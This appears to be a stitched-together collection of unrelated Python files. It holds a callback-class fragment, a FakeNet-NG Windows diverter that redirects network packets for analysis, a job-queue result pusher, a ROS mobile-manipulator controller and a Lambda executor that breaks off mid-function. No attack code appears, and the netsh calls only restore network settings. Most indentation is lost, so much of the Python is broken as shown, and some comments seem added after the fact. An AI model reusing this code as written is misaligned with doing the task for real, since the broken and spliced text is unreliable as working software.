# Magic method to allow use of len() function call on this Class of objects
def __len__(self):
return len(self.__cbs)
    # Allow iterating over the Callback object directly instead of over its underlying list
def __iter__(self):
# By using the iterable form from the list itself, __next__ does not need to be implemented
return iter(self.__cbs)
# Allow user to use these dunder methods to do +, -, +=, -= operations on this class of objects
__add__ = __iadd__ = append
__sub__ = __isub__ = remove
# Shorthand to allow user to append callback by calling callback(value)
__call__ = append
    # Allow the user to see the stored list when the object is evaluated directly (e.g. at the REPL), instead of using the get method
    def __repr__(self):
        return repr(self.__cbs)
# Working on making this into a 'dict' like object to call callbacks specifically.
# def __getitem__(self, )
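# A minimal usage sketch (not part of the original module); the variable and
# callback names are hypothetical. It only exercises the public surface defined
# above: set/__call__, the on_set/on_change Callback objects and their '+='
# support (which works because Callback.append returns self).
if __name__ == '__main__':
    import time

    temperature = Watch(20)

    def log_set(value):
        print('set called with', value)

    def log_change(value):
        print('value changed to', value)

    temperature.on_set += log_set
    temperature.on_change += log_change

    temperature.set(20)   # same value: only the on_set callbacks fire
    temperature(25)       # __call__ is an alias for set; on_set and on_change fire

    # Callbacks run on daemon threads, so give them a moment before exiting
    time.sleep(0.2)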
|
windows.py
|
# Diverter for Windows implemented using WinDivert library
import logging
from pydivert.windivert import *
import socket
import os
import dpkt
from . import fnpacket
import time
import threading
import platform
from .winutil import *
from .diverterbase import *
import subprocess
class WindowsPacketCtx(fnpacket.PacketCtx):
def __init__(self, lbl, wdpkt):
self.wdpkt = wdpkt
raw = wdpkt.raw.tobytes()
super(WindowsPacketCtx, self).__init__(lbl, raw)
# Packet mangling properties are extended here to also write the data to
# the pydivert.Packet object. This is because there appears to be no way to
# populate the pydivert.Packet object with plain octets unless you can also
# provide @interface and @direction arguments which do not appear at a
# glance to be directly available as attributes of pydivert.Packet,
# according to https://ffalcinelli.github.io/pydivert/
#
# Perhaps we can get these from wd_addr?
# src_ip overrides
@property
def src_ip(self):
return self._src_ip
@src_ip.setter
def src_ip(self, new_srcip):
super(self.__class__, self.__class__).src_ip.fset(self, new_srcip)
self.wdpkt.src_addr = new_srcip
# dst_ip overrides
@property
def dst_ip(self):
return self._dst_ip
@dst_ip.setter
def dst_ip(self, new_dstip):
super(self.__class__, self.__class__).dst_ip.fset(self, new_dstip)
self.wdpkt.dst_addr = new_dstip
# sport overrides
@property
def sport(self):
return self._sport
@sport.setter
def sport(self, new_sport):
super(self.__class__, self.__class__).sport.fset(self, new_sport)
if self.proto:
self.wdpkt.src_port = new_sport
# dport overrides
@property
def dport(self):
return self._dport
@dport.setter
def dport(self, new_dport):
super(self.__class__, self.__class__).dport.fset(self, new_dport)
if self.proto:
self.wdpkt.dst_port = new_dport
class Diverter(DiverterBase, WinUtilMixin):
def __init__(self, diverter_config, listeners_config, ip_addrs,
logging_level=logging.INFO):
# Populated by winutil and used to restore modified Interfaces back to
# DHCP
self.adapters_dhcp_restore = list()
self.adapters_dns_restore = list()
super(Diverter, self).__init__(diverter_config, listeners_config,
ip_addrs, logging_level)
self.running_on_windows = True
if not self.single_host_mode:
self.logger.critical('Windows diverter currently only supports '
'SingleHost mode')
sys.exit(1)
# Used (by winutil) for caching of DNS server names prior to changing
self.adapters_dns_server_backup = dict()
# Configure external and loopback IP addresses
self.external_ip = self.get_best_ipaddress()
if not self.external_ip:
self.external_ip = self.get_ip_with_gateway()
if not self.external_ip:
self.external_ip = socket.gethostbyname(socket.gethostname())
self.logger.debug('External IP: %s Loopback IP: %s' %
(self.external_ip, self.loopback_ip))
#######################################################################
# Initialize filter and WinDivert driver
# Interpose on all IP datagrams so they appear in the pcap, let
# DiverterBase decide whether they're actually forwarded etc.
self.filter = 'outbound and ip'
# Initialize WinDivert
try:
self.handle = WinDivert(filter=self.filter)
self.handle.open()
except WindowsError as e:
if e.winerror == 5:
self.logger.critical('ERROR: Insufficient privileges to run '
'windows diverter.')
self.logger.critical(' Please restart with '
'Administrator privileges.')
sys.exit(1)
elif e.winerror == 3:
self.logger.critical('ERROR: Could not locate WinDivert DLL '
'or one of its components.')
self.logger.critical(' Please make sure you have copied '
'FakeNet-NG to the C: drive.')
sys.exit(1)
else:
self.logger.critical('ERROR: Failed to open a handle to the '
'WinDivert driver: %s', e)
sys.exit(1)
###########################################################################
# Diverter controller functions
def startCallback(self):
# Set local DNS server IP address
if self.is_set('modifylocaldns'):
self.set_dns_server(self.external_ip)
# Stop DNS service
if self.is_set('stopdnsservice'):
self.stop_service_helper('Dnscache')
self.logger.debug('Diverting ports: ')
self.flush_dns()
self.diverter_thread = threading.Thread(target=self.divert_thread)
self.diverter_thread.daemon = True
self.diverter_thread.start()
return True
def divert_thread(self):
try:
while True:
wdpkt = self.handle.recv()
if wdpkt is None:
self.logger.error('ERROR: Can\'t handle packet.')
continue
pkt = WindowsPacketCtx('divert_thread', wdpkt)
cb3 = [
self.check_log_icmp,
self.redirIcmpIpUnconditionally
]
cb4 = [
self.maybe_redir_port,
self.maybe_fixup_sport,
self.maybe_redir_ip,
self.maybe_fixup_srcip,
]
self.handle_pkt(pkt, cb3, cb4)
# Attempt to send the processed packet
self.setLastErrorNull() # WinDivert/LastError workaround
try:
self.handle.send(pkt.wdpkt)
except Exception as e:
protocol = 'Unknown'
if pkt.proto:
protocol = pkt.proto
elif pkt.is_icmp:
protocol = 'ICMP'
self.logger.error('ERROR: Failed to send %s %s %s packet',
self.pktDirectionStr(pkt),
self.pktInterfaceStr(pkt), protocol)
self.logger.error(' %s' % (pkt.hdrToStr()))
self.logger.error(' %s', e)
except WindowsError as e:
if e.winerror in [4, 6, 995]:
return
else:
raise
def stopCallback(self):
if self.pcap:
self.pcap.close()
self.handle.close()
# Restore DHCP adapter settings
for interface_name in self.adapters_dhcp_restore:
cmd_set_dhcp = ('netsh interface ip set address name="%s" dhcp' %
interface_name)
# Restore DHCP on interface
try:
subprocess.check_call(cmd_set_dhcp, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
self.logger.error('Failed to restore DHCP on interface %s.' %
interface_name)
else:
self.logger.info('Restored DHCP on interface %s' %
interface_name)
# Restore DHCP adapter settings
for interface_name in self.adapters_dns_restore:
cmd_del_dns = ('netsh interface ip delete dns name="%s" all' %
interface_name)
cmd_set_dns_dhcp = ('netsh interface ip set dns "%s" dhcp' %
interface_name)
# Restore DNS on interface
try:
subprocess.check_call(cmd_del_dns, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
subprocess.check_call(cmd_set_dns_dhcp, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError as e:
self.logger.error("Failed to restore DNS on interface %s." %
interface_name)
else:
self.logger.info("Restored DNS on interface %s" %
interface_name)
# Restore DNS server
if self.is_set('modifylocaldns'):
self.restore_dns_server()
# Restart DNS service
if self.is_set('stopdnsservice'):
self.start_service_helper('Dnscache')
self.flush_dns()
return True
def pktInterfaceStr(self, pkt):
"""WinDivert provides is_loopback which Windows Diverter uses to
display information about the disposition of packets it is
processing during error and other cases.
"""
return 'loopback' if pkt.wdpkt.is_loopback else 'external'
def pktDirectionStr(self, pkt):
"""WinDivert provides is_inbound which Windows Diverter uses to
display information about the disposition of packets it is
processing during error and other cases.
"""
return 'inbound' if pkt.wdpkt.is_inbound else 'outbound'
def redirIcmpIpUnconditionally(self, crit, pkt):
"""Redirect ICMP to loopback or external IP if necessary.
On Windows, we can't conveniently use an iptables REDIRECT rule to get
ICMP packets sent back home for free, so here is some code.
"""
if (pkt.is_icmp and
pkt.dst_ip not in [self.loopback_ip, self.external_ip]):
self.logger.info('Modifying ICMP packet (type %d, code %d):' %
(pkt.icmp_type, pkt.icmp_code))
self.logger.info(' from: %s' % (pkt.hdrToStr()))
pkt.dst_ip = self.getNewDestinationIp(pkt.src_ip)
self.logger.info(' to: %s' % (pkt.hdrToStr()))
return pkt
def main():
diverter_config = {'redirectalltraffic': 'no',
'defaultlistener': 'DefaultListener',
'dumppackets': 'no'}
listeners_config = {'DefaultListener': {'port': '1337', 'protocol': 'TCP'}}
    # NOTE: Diverter.__init__ above also requires an ip_addrs argument; an empty
    # list is passed here only so this standalone smoke test can construct the object.
    diverter = Diverter(diverter_config, listeners_config, [])
diverter.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
diverter.stop()
###########################################################################
# Run tests
# TODO
if __name__ == '__main__':
main()
|
resultPusher.py
|
#!/usr/bin/env python
"""
Script: resultPusher
Checks the queue for completed jobs, and notifies <mqsub> instances that the corresponding job has been completed.
Runs on the same machine from which jobs have been submitted.
"""
#
# Fix: push results only for the local machine. (the mq task directory should record the machine name on which
# the mqsub script ran.)
#
from Operations.MiscUtil import SlurpFile, DumpFile, GetHostName, coerceVal, FirstLineOfFile, dbg
import os, errno, time, getpass, multiprocessing, optparse, sys, random, logging, contextlib, signal
def GetTaskAttr( fname, attrName, defaultVal = None ):
"""Return the specified attribute of a task, or the specified default value if the task does not have this attribute."""
for line in SlurpFile( fname ).rstrip('\n').split('\n'):
arg, val = line.split('\t')
if arg == attrName: return coerceVal( val )
return defaultVal
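# Worked example (hypothetical file contents, matching the tab-separated
# "name<TAB>value" lines parsed above): if attrs.tsv contains
#   piperun_outputSavedTo<TAB>/path/to/out
#   exitCode<TAB>0
# then GetTaskAttr( 'attrs.tsv', 'exitCode', defaultVal = -1 ) returns the coerced
# value 0, and asking for an attribute that is not present returns defaultVal.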
def GetSubmitHost( submithostFN ):
"""Return the name of the host on which the task runs"""
return FirstLineOfFile( submithostFN )
def PushResults( options ):
"""Push finished results"""
logging.info( 'Starting result pusher as process %d on host %s with options %s' %
( os.getpid(), GetHostName(), options ) )
# check that all queues exist
assert all( os.path.exists( queue ) and os.path.isdir( queue )
for queue in options.queues.split( os.pathsep ) )
stopSignal = [ False ]
def SetStopSignal( sigNum, stkFrm ):
logging.info( 'Setting stop signal to stop pushers' )
stopSignal[ 0 ] = True
dbg( '"aftset" stopSignal' )
signal.signal( signal.SIGUSR2, SetStopSignal )
while not stopSignal[0]:
for queue in options.queues.split( os.pathsep ):
logging.info( 'Pushing results in ' + queue + '...' )
# find an unclaimed task in this queue, and try to claim it
try: taskDirs = filter( lambda f: f.startswith('mq'), os.listdir( queue ) )
except EnvironmentError as e:
logging.info( 'Error getting list of tasks in queue ' + queue + ': ' + str( e ) )
# sleep a bit -- maybe it's some transient condition that will resolve itself
time.sleep( 60 + random.normalvariate( 3.0, 1.0 ) )
continue
for taskDir in taskDirs:
fullTaskDir = os.path.join( queue, taskDir )
try:
pushingFN = os.path.join( fullTaskDir, 'pushing.dat' )
submithostFN = os.path.join( fullTaskDir, 'submithost.txt' )
if os.path.exists( os.path.join( fullTaskDir, 'completed.dat' ) ) \
and os.path.exists( submithostFN ) and GetSubmitHost( submithostFN ) == GetHostName() \
and not os.path.exists( pushingFN ):
try:
fd = os.open( pushingFN, os.O_CREAT|os.O_EXCL|os.O_WRONLY )
except EnvironmentError as e:
if e.errno not in ( errno.EEXIST, errno.EACCES, errno.EAGAIN ): raise
# another resultPusher beat us to this task -- go and check other tasks
continue
os.write( fd, 'result being pushed by process %d on host %s' % ( os.getpid(), GetHostName() ) )
os.close( fd )
taskDescr = ''
try:
attrsFN = os.path.join( fullTaskDir, 'attrs.tsv' )
if os.path.exists( attrsFN ):
taskDescr += ' output in ' + GetTaskAttr( attrsFN, 'piperun_outputSavedTo' )
except EnvironmentError as e:
logging.info( 'Could not read attrs for task in ' + fullTaskDir + ': ' + str( e ) )
try:
infoFNs = [ os.path.join( fullTaskDir, f ) for f in ( 'command.dat', 'attrs.tsv', 'claimed.dat' ) ]
infoContents = '\n'.join([ SlurpFile( f ) if os.path.exists( f ) else 'missing file: ' + f
for f in infoFNs ])
thePipe = os.open( os.path.join( fullTaskDir, 'getresult' ), os.O_WRONLY | os.O_NONBLOCK )
exitCodeReadOk = False
writeOk = False
closeOk = False
exitCode = 'UNKNOWN'
try:
exitCode = SlurpFile( os.path.join( fullTaskDir, 'exitCode.dat' ) ).strip()
exitCodeReadOk = True
os.write( thePipe, exitCode )
writeOk = True
finally:
os.close( thePipe )
closeOk = True
logging.info( 'Pushed result in ' + fullTaskDir + ': ' + ( 'nonzero ' if exitCode != '0' else '' ) + 'exit code ' + exitCode + taskDescr )
if not writeOk or not closeOk or not exitCodeReadOk: dbg( 'exitCodeReadOk writeOk closeOk' )
if exitCodeReadOk and exitCode != '0': logging.info( infoContents )
except EnvironmentError as e:
logging.info( 'The task at ' + fullTaskDir + ' seems to have been orphaned: ' + e.strerror )
except EnvironmentError as e:
logging.info( 'Error processing queue ' + queue + ' task ' + taskDir + ': ' + str( e ) )
# sleep a bit -- maybe it's some transient condition that will resolve itself
time.sleep( 60 + random.normalvariate( 3.0, 1.0 ) )
# if we pushed at least something, go back and try again. if not, wait.
time.sleep( options.sleepInterval + random.normalvariate( 3.0, 1.0 ) )
allPushers = []
def StartPushers( use_args = None, as_daemons = False ):
parser = optparse.OptionParser()
parser.add_option( '-P', '--num-result-pushers', type='int', dest = 'numResultPushers',
help='create NUMPROCS parallel result pushers', metavar='NUMPROCS',
default=1 )
parser.add_option( '-Q', '--queues', dest = 'queues',
default = os.path.join( '..', 'Other', 'queues', getpass.getuser() ),
help='push results for the specified QUEUES', metavar='QUEUES' )
parser.add_option( '-S', '--sleepInterval', type='int',
help = 'between checks, sleep for SEC seconds', metavar = 'SEC', default = 20 )
dbg( 'use_args' )
(options, args) = parser.parse_args( args = sys.argv[1:] if use_args is None else list( use_args ) )
dbg( 'options args' )
assert not args
for i in range( options.numResultPushers ):
p = multiprocessing.Process( target = PushResults, args = ( options, ) )
allPushers.append( p )
p.daemon = as_daemons
p.start()
time.sleep( min( 1.0, random.normalvariate( 4.0, 1.0 ) ) )
def StopPushers():
"""Stop all runners"""
for pusher in allPushers:
if pusher.pid is not None:
os.kill( pusher.pid, signal.SIGUSR2 )
pusher.join()
@contextlib.contextmanager
def RunPushers( use_args = None ):
"""Do things while running result pushers"""
StartPushers( use_args )
yield
StopPushers()
if __name__ == '__main__':
print 'STARTING PUSHERS FROM MAIN'
StartPushers()
|
control_Husky_UR3_5.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
import sys
import rospy
import copy, math
import threading
import time
from math import pi, radians, degrees, atan2, sqrt
from moveit_commander import MoveGroupCommander, RobotCommander
from moveit_commander import PlanningSceneInterface, roscpp_initialize, roscpp_shutdown
from moveit_commander.conversions import pose_to_list
from geometry_msgs.msg import PoseStamped, Pose, Point, Quaternion, Twist
from moveit_msgs.msg import Grasp, GripperTranslation, PlaceLocation, MoveItErrorCodes, DisplayTrajectory
from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint
from tf.transformations import euler_from_quaternion, quaternion_from_euler
import random
import actionlib
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from geometry_msgs.msg import PoseWithCovarianceStamped, Quaternion
from tf.transformations import quaternion_from_euler, euler_from_quaternion
from std_msgs.msg import String
from nav_msgs.msg import Odometry
#GROUP_NAME_GRIPPER = "NAME OF GRIPPER"
roscpp_initialize(sys.argv)
rospy.init_node('control_Husky_UR3', anonymous=True)
robot = RobotCommander()
scene = PlanningSceneInterface()
## Variables for the mobile platform
x = 0.0
y = 0.0
theta = 0.0
## Variables for the manipulator
group_name = "ur3_manipulator"
move_group = MoveGroupCommander(group_name)
FIXED_FRAME = 'world'
display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path',
DisplayTrajectory,
queue_size=20)
def newOdom(msg):
global x
global y
global theta
x = msg.pose.pose.position.x
y = msg.pose.pose.position.y
rot_q = msg.pose.pose.orientation
(roll, pitch, theta) = euler_from_quaternion([rot_q.x, rot_q.y, rot_q.z, rot_q.w])
def move_base(a,b): # Takes x,y coordinates and drives the platform there; theta is determined by the x and y coordinates (relative to the origin).
sub = rospy.Subscriber("/odometry/filtered", Odometry, newOdom)
pub = rospy.Publisher("/cmd_vel", Twist, queue_size = 1)
speed = Twist()
r = rospy.Rate(4)
goal = Point()
goal.x = a
goal.y = b
goal_angle = atan2(goal.y,goal.x)
while abs(goal.x-x) >0.1 or abs(goal.y-y) >0.1 or abs(goal_angle-theta) >0.1 : # break once we are within 0.1 of the goal.
inc_x = goal.x -x
inc_y = goal.y -y
angle_to_goal = atan2(inc_y, inc_x)
if abs(angle_to_goal - theta) > 0.1:
speed.linear.x = 0.0
speed.angular.z = 0.3
if(angle_to_goal -theta)>0 and (angle_to_goal -theta)<0.1: # Once within range, slow way down so we do not overshoot the target heading.
speed.linear.x = 0.0
speed.angular.z = -0.02
elif(angle_to_goal-theta)<0 and (angle_to_goal -theta)>-0.1:
speed.linear.x = 0.0
speed.angular.z = 0.02
else:
speed.linear.x = 0.3
speed.angular.z = 0.0
if abs(goal.x-x)<0.1 and abs(goal.y-y)<0.1: # Once within range, slow way down so we do not overshoot the goal point.
speed.linear.x = 0.01
speed.angular.z = 0.0
print goal.x-x, goal.y-y, goal_angle-theta
pub.publish(speed)
r.sleep()
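# Worked example for the heading computation in move_base (illustrative numbers):
# for a goal of (1, 1) seen from the origin, goal_angle = atan2(1, 1) = pi/4
# ~= 0.785 rad, so the base first rotates until theta is within about 0.1 rad of
# 0.785 and only then drives straight toward the goal.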
def move_joint(q1,q2,q3,q4,q5,q6):
joint_goal = move_group.get_current_joint_values()
mobile_joints = [-pi/3, 0.5]
joint_goal_list = [q1,q2,q3,q4,q5,q6]
# Set the manipulator joint values
joint_goal[0] = joint_goal_list[0]
joint_goal[1] = joint_goal_list[1]
joint_goal[2] = joint_goal_list[2]
joint_goal[3] = joint_goal_list[3]
joint_goal[4] = joint_goal_list[4]
joint_goal[5] = joint_goal_list[5]
# Start the motion
move_group.go(joint_goal, wait=True)
#bool rotation_init = true
def move_mobile_manipulator(a,b,q1,q2,q3,q4,q5,q6):
move_joint(pi*90/180, pi*-130/180 , pi*111/180, pi*-68/180, pi*-90/180, 0) #UR3 home pose
sub = rospy.Subscriber("/odometry/filtered", Odometry, newOdom)
pub = rospy.Publisher("/cmd_vel", Twist, queue_size = 1)
speed = Twist()
r = rospy.Rate(4)
goal = Point()
goal.x = a
goal.y = b
final_angle_to_goal = atan2(b, a)
arrival_radius = 0.1
while (goal.x-x)**2 + (goal.y-y)**2 >= arrival_radius :
#while abs(goal.x-x) >0.1 or abs(goal.y-y) >0.1 or abs(angle_to_goal-theta) >0.1 : # break once we are within 0.3 of the goal.
inc_x = goal.x -x
inc_y = goal.y -y
angle_to_goal = atan2(inc_y,inc_x)
if abs(angle_to_goal - theta) > 2*pi/180:
speed.linear.x = 0.0
speed.angular.z = 0.3
if abs(angle_to_goal - theta) < 5*pi/180: # Once inside this band, slow way down so we do not overshoot the target heading.
speed.angular.z = 0.03
speed.linear.x = 0.0
else:
speed.linear.x = 0.2
speed.angular.z = 0.0
if abs(goal.x-x) <0.3 and abs(goal.y-y)<0.3: # Once the x,y error is within 0.3, reduce the speed sharply.
speed.linear.x = 0.05
speed.angular.z = 0.0
print goal.x-x, goal.y-y, angle_to_goal-theta
pub.publish(speed)
r.sleep()
print 'final angle:',final_angle_to_goal,'theta:',theta
t = 0
init_time = time.time()
while abs(final_angle_to_goal - theta) > 2*pi/180:
if theta-final_angle_to_goal>0:
speed.linear.x = 0
speed.angular.z = -0.1
else:
speed.linear.x = 0
speed.angular.z = 0.1
#if abs(theta-final_angle_to_goal) <0.3:
# speed.linear.x = 0
# speed.angular.z = 0.03
pub.publish(speed)
r.sleep()
cur_time = time.time()
t = cur_time-init_time
print t,'sec'
move_joint(q1,q2,q3,q4,q5,q6) # move the manipulator joints
def move_base_thread(a,b):
thread=threading.Thread(target=move_base, args=(a,b))
thread.daemon=True
thread.start()
def move_joint_thread(q1,q2,q3,q4,q5,q6):
thread=threading.Thread(target=move_joint, args=(q1,q2,q3,q4,q5,q6))
thread.daemon=True
thread.start()
def get_pose():
robot_state = move_group.get_current_pose()
robot_angle = move_group.get_current_joint_values()
print("=====robot_state====")
print(robot_state)
print("=====robot_angle====")
print(robot_angle)
if __name__=='__main__':
move_mobile_manipulator(1,1,pi/2,-pi/2,0,0,0,0)
#move_mobile_manipulator(1.1,1.1,pi/2,0,0,0,0,0)
# function? origin(0, 0, 0) -> (10, 20, 80)
# move_mobile_manipulator( 1.4001 , 0.6723 , 1.5700 , -0.8131 , 0.8344 , -1.4314 , -1.5700 , 0)
#move_mobile_manipulator(1.2,1.2,pi/2,0,0,0,0,0)
#move_mobile_manipulator(1.3,1.3,pi/2,0,0,0,0,0)
#move_mobile_manipulator(1.4,1.4,pi/2,0,0,0,0,0)
#
#move_mobile_manipulator(2,2,pi/2,0,0,0,0,0)
#move_mobile_manipulator(-2,-2,pi/2,0,0,0,0,0)
#move_mobile_manipulator(0.25,0.25,pi/2,0,0,0,0,0)
#get_pose()
|
lambda_executors.py
|
import base64
import glob
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
import traceback
from multiprocessing import Process, Queue
from typing import Tuple
from localstack import config
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8,
LAMBDA_RUNTIME_JAVA11,
LAMBDA_RUNTIME_PROVIDED,
)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.aws.dead_letter_queue import (
lambda_error_to_dead_letter_queue,
sqs_error_to_dead_letter_queue,
)
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched, store_cloudwatch_logs
from localstack.utils.common import (
TMP_FILES,
CaptureOutput,
FuncThread,
get_docker_container_names,
get_free_tcp_port,
in_docker,
json_safe,
last_index_of,
long_uid,
now,
run,
save_file,
short_uid,
to_bytes,
to_str,
)
from localstack.utils.docker import DOCKER_CLIENT, ContainerException
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = "cloud.localstack.LambdaExecutor"
EVENT_FILE_PATTERN = "%s/lambda.event.*.json" % config.TMP_FOLDER
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
MAX_ENV_ARGS_LENGTH = 20000
INTERNAL_LOG_PREFIX = "ls-daemon: "
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = "aws:sqs"
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = "/var/task"
class InvocationException(Exception):
def __init__(self, message, log_output, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
def get_from_event(event, key):
try:
return event["Records"][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details) or ""
return runtime.startswith("nodejs")
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = "/aws/lambda/%s" % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime("%Y/%m/%d", time.gmtime(invocation_time_secs))
log_stream_name = "%s/[LATEST]%s" % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
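# Illustrative example of the naming scheme above (values are hypothetical): a
# function named "my-func" invoked with container id "abc123" around 2021-06-01
# gets log_group_name "/aws/lambda/my-func" and log_stream_name
# "2021/06/01/[LATEST]abc123".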
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if not config.HOSTNAME_FROM_LAMBDA and DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info("Determined main container target IP: %s" % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
container_name = bootstrap.get_main_container_name()
LOG.info(
'Unable to get IP address of main Docker container "%s": %s' % (container_name, e)
)
# return (1) predefined endpoint host, or (2) main container IP, or (3) Docker host (e.g., bridge IP)
return (
config.HOSTNAME_FROM_LAMBDA or DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
)
def rm_docker_container(container_name_or_id, check_existence=False, safe=False):
# TODO: remove method / move to docker module
if not container_name_or_id:
return
if check_existence and container_name_or_id not in get_docker_container_names():
# TODO: check names as well as container IDs!
return
try:
DOCKER_CLIENT.remove_container(container_name_or_id)
except Exception:
if not safe:
raise
class InvocationResult(object):
def __init__(self, result, log_output=""):
if isinstance(result, InvocationResult):
raise Exception("Unexpected invocation result type: %s" % result)
self.result = result
self.log_output = log_output or ""
class LambdaExecutor(object):
"""Base class for Lambda executors. Subclasses must overwrite the _execute method"""
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, func_details):
# setup environment pre-defined variables for docker environment
result = func_details.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, func_details.region())
return result
def execute(
self,
func_arn,
func_details,
event,
context=None,
version=None,
asynchronous=False,
callback=None,
):
def do_execute(*args):
@cloudwatched("lambda")
def _run(func_arn=None):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, "eventSource") == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, "eventSourceARN")
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(
result, func_arn, event, error=raised_error, dlq_sent=dlq_sent
)
lambda_result_to_destination(
func_details, event, result, asynchronous, raised_error
)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug(
"Lambda executed in Event (asynchronous) mode, no response will be returned to caller"
)
FuncThread(do_execute).start()
return InvocationResult(None, log_output="Lambda executed asynchronously.")
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
"""This method must be overwritten by subclasses."""
raise NotImplementedError
def startup(self):
pass
def cleanup(self, arn=None):
pass
class ContainerInfo:
"""Contains basic information about a docker container."""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
"""Abstract executor class for executing Lambda functions in Docker containers"""
def execute_in_container(
self, func_details, env_vars, command, stdin=None, background=False
) -> Tuple[bytes, bytes]:
raise NotImplementedError
def run_lambda_executor(self, event=None, func_details=None, env_vars=None, command=None):
env_vars = dict(env_vars or {})
runtime = func_details.runtime or ""
stdin_str = None
event_body = event if event is not None else env_vars.get("AWS_LAMBDA_EVENT_BODY")
event_body = json.dumps(event_body) if isinstance(event_body, dict) else event_body
event_body = event_body or ""
is_large_event = len(event_body) > MAX_ENV_ARGS_LENGTH
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if (
not is_large_event
and func_details
and is_provided
and env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1"
):
# Note: certain "provided" runtimes (e.g., Rust programs) can block if we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
"AWS_LAMBDA_EVENT_BODY": to_str(
event_body
), # Note: seems to be needed for provided runtimes!
"DOCKER_LAMBDA_USE_STDIN": "1",
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop("AWS_LAMBDA_COGNITO_IDENTITY", None)
if is_large_event:
# in case of very large event payloads, we need to pass them via stdin
LOG.debug(
"Received large Lambda event payload (length %s) - passing via stdin"
% len(event_body)
)
env_vars["DOCKER_LAMBDA_USE_STDIN"] = "1"
if env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1":
stdin_str = event_body
if not is_provided:
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
elif "AWS_LAMBDA_EVENT_BODY" not in env_vars:
env_vars["AWS_LAMBDA_EVENT_BODY"] = to_str(event_body)
event_stdin_bytes = stdin_str and to_bytes(stdin_str)
error = None
try:
result, log_output = self.execute_in_container(
func_details, env_vars, command, event_stdin_bytes
)
except ContainerException as e:
result = e.stdout or ""
log_output = e.stderr or ""
error = e
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = func_details and func_details.arn()
